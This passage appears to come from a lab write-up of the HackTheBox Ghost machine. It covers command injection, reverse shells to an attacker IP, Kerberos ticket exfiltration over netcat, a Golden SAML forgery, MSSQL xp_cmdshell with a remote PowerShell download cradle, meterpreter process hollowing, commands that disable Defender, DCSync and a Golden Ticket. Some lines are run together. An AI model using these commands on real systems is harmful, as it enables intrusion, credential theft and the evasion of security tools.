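With escaping in place, the * trick and the character-by-character enumeration shown earlier would both stop working.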

Initial Access

Crafting our Payload

- Target API URL: http://intranet.ghost.htb:8008/api-dev

- Vulnerable route: /scan

- Authentication: requires the header X-DEV-INTRANET-KEY: !@yqr!X2kxmQ.@Xe

- Format: the API expects input in JSON format within the url variable. Basic body:

{ "url": "http://test.com" }

- To execute commands, we can pass the URL as expected and append ; or | followed by our command:

{ "url": "http://test.com; whoami" }

- The final payload looks like this:

curl -s -X POST http://intranet.ghost.htb:8008/api-dev/scan \
  -H 'X-DEV-INTRANET-KEY: !@yqr!X2kxmQ.@Xe' \
  -H 'Content-Type: application/json' \
  -d '{"url":"https://test.com; whoami"}' | jq -r '.temp_command_stdout'

Our command executes successfully, confirming that the application is running as root.
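For repeated commands, the same request can be wrapped in a small Python helper. This is a sketch equivalent to the curl call, using only the standard library; build_scan_body, build_scan_request, and run are hypothetical names, and run needs network access to the lab.

```python
import json
import urllib.request

SCAN_URL = "http://intranet.ghost.htb:8008/api-dev/scan"
DEV_KEY = "!@yqr!X2kxmQ.@Xe"


def build_scan_body(command: str, url: str = "https://test.com") -> bytes:
    """JSON body whose url field carries the injected shell command."""
    return json.dumps({"url": f"{url}; {command}"}).encode("utf-8")


def build_scan_request(command: str) -> urllib.request.Request:
    """Prepare the POST request with the developer key header."""
    return urllib.request.Request(
        SCAN_URL,
        data=build_scan_body(command),
        headers={
            "X-DEV-INTRANET-KEY": DEV_KEY,
            "Content-Type": "application/json",
        },
        method="POST",
    )


def run(command: str) -> str:
    """Send the request and return the command's stdout (requires lab access)."""
    with urllib.request.urlopen(build_scan_request(command), timeout=10) as resp:
        return json.load(resp)["temp_command_stdout"]
```

Building the body with json.dumps avoids the quoting mistakes that are easy to make when hand-writing JSON inside a shell string.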


Getting a Shell as Root:

Start a listener


rlwrap -cAr nc -lvnp 4444 -s 0.0.0.0

Run our reverse shell command


curl -s -X POST http://intranet.ghost.htb:8008/api-dev/scan -H 'X-DEV-INTRANET-KEY: !@yqr!X2kxmQ.@Xe' -H 'Content-Type: application/json' -d '{"url":"https://test.com | bash -i >& /dev/tcp/10.10.16.44/4444 0>&1 "}'



Judging by the hostname, we appear to be inside a container. The presence of .dockerenv confirms this, and docker-entrypoint.sh is the entry point that runs when the container starts.

Checking the entrypoint script

Nothing important: it just writes an SSH configuration to /root/.ssh/config and then executes the ghost_intranet binary.



Checking for SSH keys, I found an SSH key for florence.ramirez@ghost.htb on the workstation dev-workstation.

No SSH port is exposed externally, so I will use it locally from inside the container.

ssh -i florence.ramirez@ghost.htb@dev-workstation:22 florence.ramirez@ghost.htb@dev-workstation

This pseudo-terminal warning typically appears when the SSH command is not run interactively.

Get a reverse shell from this stdin

- Start a listener on the local host

rlwrap -cAr nc -lvnp 4444 -s 0.0.0.0

- Execute this command in the non-interactive SSH session

bash -i >& /dev/tcp/10.10.16.44/4444 0>&1

This looks like yet another container, identified as LINUX-DEV-WS01. There are many ways to confirm that, but we can run linPEAS directly to automate the enumeration process.

Run linpeas

- On host

nc -nlvp 4444 < linpeas.sh

- On target shell

cat < /dev/tcp/host_ip/4444 | bash

There are a few things I check first in the linPEAS results before reading the whole report: the hosts file, network interfaces, local open ports, databases, and configuration files. However, since we are in a container, there isn’t much data to analyze.

The environment variable KRB5CCNAME indicates an active Kerberos ticket cache stored at /tmp/krb5cc_50. Use klist to check for active Kerberos tickets.

krb5.conf is also configured for Kerberos authentication, confirming our previous findings.
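KRB5CCNAME can hold either a bare path or a TYPE:residual pair such as FILE:/tmp/krb5cc_50. As a small sketch, assuming we only want to know where the cache lives before copying it, the value can be split like this (parse_ccache_name is a hypothetical helper name):

```python
def parse_ccache_name(value: str) -> tuple[str, str]:
    """Split a KRB5CCNAME value into (cache type, residual).

    A bare path with no "TYPE:" prefix is treated as a FILE cache.
    """
    if value.startswith("/"):
        return "FILE", value
    cache_type, sep, residual = value.partition(":")
    if not sep:
        return "FILE", value
    return cache_type.upper(), residual


if __name__ == "__main__":
    print(parse_ccache_name("FILE:/tmp/krb5cc_50"))
```

Only FILE caches can be copied off the box as a single file, which is why it is worth checking the type first.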



I’ll transfer this ticket to use it for Kerberos authentication on the domain and start the real work since this is already a Windows machine.

- On host

nc -nlvp 80 > krb5cc_50

- On target session

cat /tmp/krb5cc_50 > /dev/tcp/10.10.16.44/80

To confirm the ticket didn’t change during the transfer, check the checksum of both the original ticket on the target machine and the transferred one.
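The checksum comparison can be done with any hashing tool. Here is a minimal Python sketch using SHA-256; the function names are my own, and the same function would be run on both sides so the two digests can be compared by eye.

```python
import hashlib


def sha256_of(path: str) -> str:
    """Return the SHA-256 hex digest of a file, read in chunks."""
    digest = hashlib.sha256()
    with open(path, "rb") as handle:
        for chunk in iter(lambda: handle.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def same_file_contents(path_a: str, path_b: str) -> bool:
    """True when both files hash to the same digest."""
    return sha256_of(path_a) == sha256_of(path_b)
```

For example, sha256_of("krb5cc_50") on our host should print the same digest as the equivalent check on /tmp/krb5cc_50 in the target session.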

- On our local host, export the ticket to use it for authentication:

export KRB5CCNAME=/home/zyad/htb/ghost/krb5cc_50

- Then validate it by authenticating to the domain. I’ll use netexec for this.

nxc ldap 10.10.11.24 -u florence.ramirez -k --use-kcache

DNS Spoofing

Before, we couldn’t do DNS spoofing because we didn’t have any domain user credentials. But now that we can authenticate to the domain, we can use that access to perform DNS spoofing.

- Setup listener

sudo responder -I tun0

- Add a DNS record (I mentioned this earlier)



There was an error while running the command. One of the first things I check when dealing with Kerberos is time synchronization since a large time difference can cause authentication issues. Additionally, I make sure to configure krb5.conf properly and always use the FQDN instead of just the domain name when working with Kerberos.
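To make the time check concrete: Kerberos rejects requests when the client and KDC clocks drift too far apart, and five minutes is the usual default tolerance. The sketch below assumes that default applies here and that we already have both timestamps; the names are hypothetical.

```python
from datetime import datetime, timedelta, timezone

# Assumption: the common 5-minute default tolerance applies to this domain.
MAX_SKEW = timedelta(minutes=5)


def within_kerberos_skew(local: datetime, kdc: datetime,
                         max_skew: timedelta = MAX_SKEW) -> bool:
    """Return True when the two clocks differ by no more than max_skew."""
    return abs(local - kdc) <= max_skew


if __name__ == "__main__":
    now = datetime.now(timezone.utc)
    # Simulated KDC clock running seven minutes ahead of ours.
    print(within_kerberos_skew(now, now + timedelta(minutes=7)))
```

If this returns False, sync the clock before retrying anything that uses the ticket.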

I’ve been working on my own kit to manage all these processes and more when dealing with Kerberos, but I haven’t finished it yet to publish.

You can use this command for time synchronization:

sudo ntpdate -u dc01.ghost.htb

And modify /etc/krb5.conf, adding this:

[libdefaults]
    default_realm = GHOST.HTB

[realms]
    GHOST.HTB = {
        kdc = dc01.ghost.htb
        admin_server = dc01.ghost.htb
    }

[domain_realm]
    ghost.htb = GHOST.HTB
    .ghost.htb = GHOST.HTB

After that, repeat the command, making sure to use the FQDN:

python3 dnstool.py -u GHOST.HTB\\florence.ramirez dc01.ghost.htb -r bitbucket.ghost.htb -a add -d 10.10.16.44 -dns-ip 10.10.11.24 -k



We were able to capture Justin Bradley’s hash. I already explained why this happened earlier.

Copy the hash to a file and run Hashcat in autodetect mode

hashcat hash /usr/share/wordlists/rockyou.txt



We have a new user with credentials — time to get to work!

I made a simple script, nxc_bruter, to loop over all the services I need while spraying a password, since nxc only supports one service at a time. It also helped with Pro Labs.


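The idea of looping nxc over several services can be sketched as below. This is not the nxc_bruter script itself, just a hypothetical illustration that builds one nxc command line per protocol; the protocol list is an assumption and the commands are only printed, not executed.

```python
import shlex

# Assumed set of services to try; adjust to whatever is exposed on the target.
PROTOCOLS = ("smb", "winrm", "ldap", "mssql", "rdp")


def build_nxc_commands(target: str, username: str, password: str,
                       protocols: tuple = PROTOCOLS) -> list:
    """Return one nxc argument list per protocol for the same credentials."""
    return [
        ["nxc", protocol, target, "-u", username, "-p", password]
        for protocol in protocols
    ]


if __name__ == "__main__":
    for argv in build_nxc_commands("10.10.11.24", "justin.bradley", "Qwertyuiop1234$$"):
        # shlex.join quotes the password so the line is safe to paste in a shell.
        print(shlex.join(argv))
```

Building argument lists rather than strings keeps the `$$` in the password from being expanded by the shell if the commands are later passed to subprocess.run.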

We have WinRM access to the domain as justin.bradley, so we can use evil-winrm for that.

At this step, I prefer to dump domain data for visualization in BloodHound.

bloodhound-python -d ghost.htb -u 'justin.bradley' -p 'Qwertyuiop1234$$' -ns 10.10.11.24 -c all --zip --dns-tcp

Import the data into BloodHound, then mark florence.ramirez and justin.bradley as owned. Next, look at the OUTBOUND OBJECT CONTROL of each owned user.



justin.bradley can read the GMSA Password of ADFS_GMSA$

Info: A gMSA (Group Managed Service Account) is a special type of service account that allows automatic password management and delegation without manual intervention. The password is securely stored and can only be retrieved by authorized users or systems, such as justin.bradley in this case.



Use any tool to retrieve the account hash, such as nxc, gMSADumper, or BloodyAD.

- nxc

nxc ldap ghost.htb -u 'justin.bradley' -p 'Qwertyuiop1234$$' --gmsa



- Or using bloodyAD

bloodyAD -d ghost.htb -u justin.bradley -p 'Qwertyuiop1234$$' --host 10.10.11.24 get object 'ADFS_GMSA$' --attr msDS-ManagedPassword

We have the NTLM hash of the ADFS_GMSA$ service account, which isn’t just a general GMSA account — it’s specifically related to ADFS. As we mentioned before, ADFS is used in SSO authentication systems, where multiple domains or services authenticate users via a centralized identity provider.

With this, we might be able to perform a Golden SAML attack for ADFS token forgery. This allows us to sign SAML tokens as ADFS, granting access to any SAML-integrated applications, such as web apps used in the environment.



But first, I would test Justin Bradley’s credentials on ADFS to check for any direct access.

Golden SAML attack

It’s time to forge a SAML token as Administrator, leveraging our ADFS_GMSA$ hash for a Golden SAML attack.



Since ADFS_GMSA$ is a member of REMOTE MANAGEMENT USERS, we can use Evil-WinRM to access the machine and dump the private key that signs the SAML tokens.

evil-winrm -i 10.10.11.24 -u 'adfs_gmsa$' -H 0bef79ae4d25b1864570212e33922d14

Download ADFSDump from source and compile it, or use the precompiled ADFSDump.exe from precompiled-binaries, then upload it to the machine.



We need to obtain the following:

- The certificate used for token signing along with its private key

- The Distributed Key Manager (DKM) secret stored in Active Directory

- The configured service providers that rely on AD FS for authentication

- Download and Set Up ADFSpoof

git clone https://github.com/mandiant/ADFSpoof.git && cd ADFSpoof
python3 -m venv .
bin/python3 -m pip install six cryptography==3.3.2 pyasn1 lxml signxml

- Prepare the Private Key and Token for the Tool

# Private key
echo '8D-AC-A4-90-70-2B-3F-D6-08-D5.....' | tr -d "-" | xxd -r -p > key.bin
# Token
echo 'AAAAAQAAAAAEEAFyHlNXh2VDska8KMTxXboGCWCGSAFl.....' | base64 -d > token.bin


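If xxd or base64 is not at hand, the same two conversions can be done in Python. This is a minimal sketch with hypothetical function names; the values in the test below are toy inputs, not the real key or token.

```python
import base64


def hex_dashed_to_bytes(text: str) -> bytes:
    """Convert a dash-separated hex string (as printed by ADFSDump) to raw bytes."""
    return bytes.fromhex(text.strip().replace("-", ""))


def b64_to_bytes(text: str) -> bytes:
    """Decode a base64 string to raw bytes."""
    return base64.b64decode(text.strip())


def write_blob(path: str, data: bytes) -> None:
    """Write the decoded bytes to disk, e.g. key.bin or token.bin."""
    with open(path, "wb") as handle:
        handle.write(data)
```

For example, write_blob("key.bin", hex_dashed_to_bytes(dkm_hex)) would produce the same file as the tr and xxd pipeline, where dkm_hex stands for the full value copied from the ADFSDump output.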

Forge the Golden SAML token

Based on these two articles, generate-a-saml-20-token-for-some-app and adfs-golden-saml, we craft our payload as follows:

bin/python3 ADFSpoof.py -b token.bin key.bin -s 'core.ghost.htb' saml2 \
  --endpoint 'https://core.ghost.htb:8443/adfs/saml/postResponse' \
  --nameidformat 'urn:oasis:names:tc:SAML:1.1:nameid-format:emailAddress' \
  --nameid 'Administrator@ghost.htb' \
  --rpidentifier 'https://core.ghost.htb:8443' \
  --assertions '<Attribute Name="http://schemas.xmlsoap.org/ws/2005/05/identity/claims/upn"><AttributeValue>Administrator@ghost.htb</AttributeValue></Attribute><Attribute Name="http://schemas.xmlsoap.org/claims/CommonName"><AttributeValue>Administrator</AttributeValue></Attribute>'



- Go back to the core page and log in using AD Federation at https://ghost.htb:8443/login

Then intercept the requests until the final one, which contains SAMLResponse=, and replace the body with our forged token from ADFSpoof.


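When swapping the token in the intercepted request, it helps to be able to inspect what a SAMLResponse field actually carries. In the SAML HTTP-POST binding the XML is base64-encoded and then form-encoded. The sketch below round-trips a toy value, and the function names are hypothetical.

```python
import base64
from urllib.parse import parse_qs, urlencode


def encode_saml_response(xml: str) -> str:
    """Return a form body carrying the XML as a base64, URL-encoded SAMLResponse."""
    token = base64.b64encode(xml.encode("utf-8")).decode("ascii")
    return urlencode({"SAMLResponse": token})


def decode_saml_response(form_body: str) -> str:
    """Extract and decode the SAMLResponse field from a form-encoded body."""
    values = parse_qs(form_body).get("SAMLResponse")
    if not values:
        raise ValueError("no SAMLResponse parameter in body")
    return base64.b64decode(values[0]).decode("utf-8")


if __name__ == "__main__":
    body = encode_saml_response("<samlp:Response>demo</samlp:Response>")
    print(body)
    print(decode_saml_response(body))
```

Decoding the original response and the forged one side by side is a quick way to confirm the endpoint and name ID match before sending the request.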

MSSQL panel

Finally, we have access to the Ghost Config Panel, an MSSQL database query debugger.

Enumeration

Run a quick enumeration to check the SQL Server instance and linked servers:



Enumerate DB server version



SELECT @@versionEnumerate Serever name



SELECT @@SERVERNAMECheck the linked servers

EXEC sp_linkedservers;In this case,

DC01is the current SQL Server instance, and the linked server is labeledPRIMARY. We can execute queries on the linked server as follows:1

EXECUTE ('query') AT [PRIMARY];
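Because the inner query travels as a string literal, every single quote inside it has to be doubled. A small sketch of that wrapping step follows; wrap_for_linked_server is a hypothetical helper, not something the panel provides.

```python
def wrap_for_linked_server(query: str, server: str = "PRIMARY") -> str:
    """Wrap a T-SQL query in EXECUTE (...) AT [server], doubling single quotes."""
    escaped_query = query.replace("'", "''")
    # A closing bracket inside a bracketed identifier is escaped by doubling it.
    escaped_server = server.replace("]", "]]")
    return f"EXECUTE ('{escaped_query}') AT [{escaped_server}];"


if __name__ == "__main__":
    print(wrap_for_linked_server("SELECT SYSTEM_USER"))
    print(wrap_for_linked_server("EXEC xp_cmdshell 'whoami'"))
```

This saves counting quotes by hand once the inner statements start carrying their own string literals.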



To check the permissions granted to the current user on the linked server:

EXECUTE ('
SELECT permission_name, state_desc
FROM sys.database_permissions
WHERE grantee_principal_id = DATABASE_PRINCIPAL_ID(USER);
') AT [PRIMARY];

The current user has only been granted



CONNECTpermission.Checking Impersonation Rights

EXECUTE ('
SELECT ''LOGIN'' as ''execute as'', '''' AS ''database'',
pe.permission_name, pe.state_desc, pr.name AS ''grantee'', pr2.name AS ''grantor''
FROM sys.server_permissions pe
JOIN sys.server_principals pr ON pe.grantee_principal_id = pr.principal_Id
JOIN sys.server_principals pr2 ON pe.grantor_principal_id = pr2.principal_Id
WHERE pe.type = ''IM''
') AT [PRIMARY];

We find that the current user can impersonate SA. The SA account belongs to the sysadmin fixed server role, which grants full control over the SQL Server instance, including all databases, configurations, and system-level operations. The SA account is created during SQL Server installation.

SA Impersonation



We now impersonate SA and enable the xp_cmdshell extended stored procedure to run commands:

EXECUTE (
'EXECUTE AS LOGIN = ''sa'';
EXEC SP_CONFIGURE ''show advanced options'', 1;
RECONFIGURE;
EXEC SP_CONFIGURE ''xp_cmdshell'', 1;
RECONFIGURE;
EXEC xp_cmdshell ''whoami'''
) AT [PRIMARY];



The commands run as the NT SERVICE\MSSQLSERVER account. Now we can establish a reverse shell as this service account.

Reverse shell



We'll use the DynWin32-ShellcodeProcessHollowing.ps1 PowerShell script, which performs shellcode-based process hollowing. This technique uses dynamically looked-up Win32 API calls to evade antivirus detection.

Preparing our shell script

- Generate Shellcode

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=Your_IP LPORT=4444 -f psh

- Add Shellcode to Script

Add the generated shellcode to the $SHELLCODE variable in the DynWin32-ShellcodeProcessHollowing.ps1 script.

Start Metasploit Listener

msfconsole -x "use exploits/multi/handler; set lhost Your_IP; set lport 4444; set payload windows/x64/meterpreter/reverse_tcp; exploit"

- Start a simple HTTP server to serve the shell script:

python3 -m http.server 80

- Execute Command via MSSQL Server

EXECUTE (
'EXECUTE AS LOGIN = ''sa'';
EXEC SP_CONFIGURE ''show advanced options'', 1;
RECONFIGURE;
EXEC SP_CONFIGURE ''xp_cmdshell'', 1;
RECONFIGURE;
EXEC xp_cmdshell ''powershell.exe -c IEX (IWR -UseBasicParsing "http://10.10.16.114:80/shell.ps1")'''
) AT [PRIMARY];

We got our reverse shell. Next, check the account privileges: whoami /priv

Privilege Escalation





We have SeImpersonatePrivilege, which allows us to escalate privileges to SYSTEM using one of the Potato exploits. This can be automated with Metasploit’s getsystem command.

Once we have SYSTEM access, we can dump the NTLM hashes of the system. This can be automated using Metasploit’s hashdump, which extracts hashes from the LSASS process.

Now that we have the NTLM hash of the krbTGT, we can generate a Golden Ticket to impersonate the Domain Administrator and gain access to the Domain Controller (DC).



But there are things to finish first. Enumerating every compromised machine is important.



Enumeration



Check system information: systeminfo

Our machine is part of the corp.ghost.htb domain, and we need to reach DC01.ghost.htb.





After compromising a new machine, I always like to dump new data for better visualization. Normally, I would upload SharpHound, but AV will flag and delete it. To bypass this, we can either exclude our path or disable the antivirus (AV) entirely.

- Exclude the Current Path from AV Scanning

powershell.exe -c 'Add-MpPreference -ExclusionPath "C:\Users\Administrator\Desktop"'

- Disable AV and AMSI

Set-MpPreference -DisableRealtimeMonitoring $true;Set-MpPreference -DisableIOAVProtection $true;Set-MPPreference -DisableBehaviorMonitoring $true;Set-MPPreference -DisableBlockAtFirstSeen $true; Set-MPPreference -DisableEmailScanning $true;Set-MPPReference -DisableScriptScanning $true;Set-MpPreference -DisableIOAVProtection $true;Add-MpPreference -ExclusionPath "C:\Users\Administrator\Desktop"

Now, upload SharpHound into the excluded directory, and it won’t be deleted.

Collect the data, download it, and import it into BloodHound.





Mark PRIMARY as owned in BloodHound, and check our privileges. We have DCSync privileges over corp.ghost.htb



The CORP domain has a bidirectional trust with the main domain.



Our PRIMARY machine is a member of the ENTERPRISE DOMAIN CONTROLLERS.

This group has DS-Replication-Get-Changes privileges on GHOST.HTB, which allows us to perform a DCSync attack.

Pivoting



I prefer working from Linux, so I’ll create a tunnel to this network using Ligolo. If you’re working from Windows, you can use Mimikatz or Rubeus to generate the Golden Ticket.

Set Up Ligolo for Tunneling

- Configure Network Interface and Route the Subnet

sudo ip tuntap add user $(whoami) mode tun ligolo
sudo ip link set ligolo up
sudo ip route add 10.0.0.0/24 dev ligolo

- Start Local Proxy

./proxy -selfcert -laddr 0.0.0.0:443

- Upload the Agent and Start the Tunnel

.\agent.exe -connect 10.10.16.114:443 -ignore-cert

- Start the session
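Once the tunnel is up, only addresses inside the routed subnet go through the ligolo interface. A quick sketch for checking whether a given address is covered by the 10.0.0.0/24 route added above is shown here; the sample address 10.0.0.10 is hypothetical.

```python
import ipaddress


def is_routed(target: str, subnet: str = "10.0.0.0/24") -> bool:
    """Return True when target falls inside the subnet routed over the tunnel."""
    return ipaddress.ip_address(target) in ipaddress.ip_network(subnet)


if __name__ == "__main__":
    # 10.0.0.10 is a made-up internal host; 10.10.11.24 is the box's external IP.
    for host in ("10.0.0.10", "10.10.11.24"):
        print(host, is_routed(host))
```

Anything that returns False here is still reached directly over the VPN rather than through the agent.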

Golden Ticket Attack

To generate a Golden Ticket, we need:



- Domain Name

- Domain SID

- krbTGT Hash





The NTLM hash didn’t work, so I had to use Mimikatz to dump it again and use the AES256 hash instead.

- Dump krbTGT Hash with Mimikatz

.\mimikatz.exe "lsadump::lsa /inject /name:krbtgt"



- Get the Enterprise Admins SID

impacket-lookupsid ghost.htb/justin.bradley:'Qwertyuiop1234$$'@10.10.11.24 | grep -B12 "Enterprise Admins"
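The Enterprise Admins SID is simply the forest root domain SID with the well-known RID 519 appended, so it can also be derived once the ghost.htb domain SID is known. A minimal sketch, with a hypothetical helper name:

```python
ENTERPRISE_ADMINS_RID = 519  # well-known RID of the Enterprise Admins group


def enterprise_admins_sid(root_domain_sid: str) -> str:
    """Append the Enterprise Admins RID to a forest root domain SID."""
    if not root_domain_sid.startswith("S-1-5-21-"):
        raise ValueError("expected a domain SID of the form S-1-5-21-...")
    return f"{root_domain_sid.rstrip('-')}-{ENTERPRISE_ADMINS_RID}"


if __name__ == "__main__":
    print(enterprise_admins_sid("S-1-5-21-4084500788-938703357-3654145966"))
```

The result is the value passed as the extra SID when forging the ticket, which is what lets a ticket issued in the child domain carry Enterprise Admins rights in the parent.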

Retrieve the Corp Domain SID

You can get this using PowerView, BloodHound, or other tools.



- Generate the Golden Ticket using impacket-ticketer

1 2 3 4

impacket-ticketer -aesKey b0eb........................5e8d \ -domain-sid S-1-5-21-2034262909-2733679486-179904498 \ -extra-sid S-1-5-21-4084500788-938703357-3654145966-519 \ -domain corp.ghost.htb Administrator Export the Ticket export



KRB5CCNAME=Administrator.ccachePerform DCSync on the Domain

1



impacket-secretsdump -k -no-pass dc01.ghost.htb -just-dc

Log in to the Domain as Administrator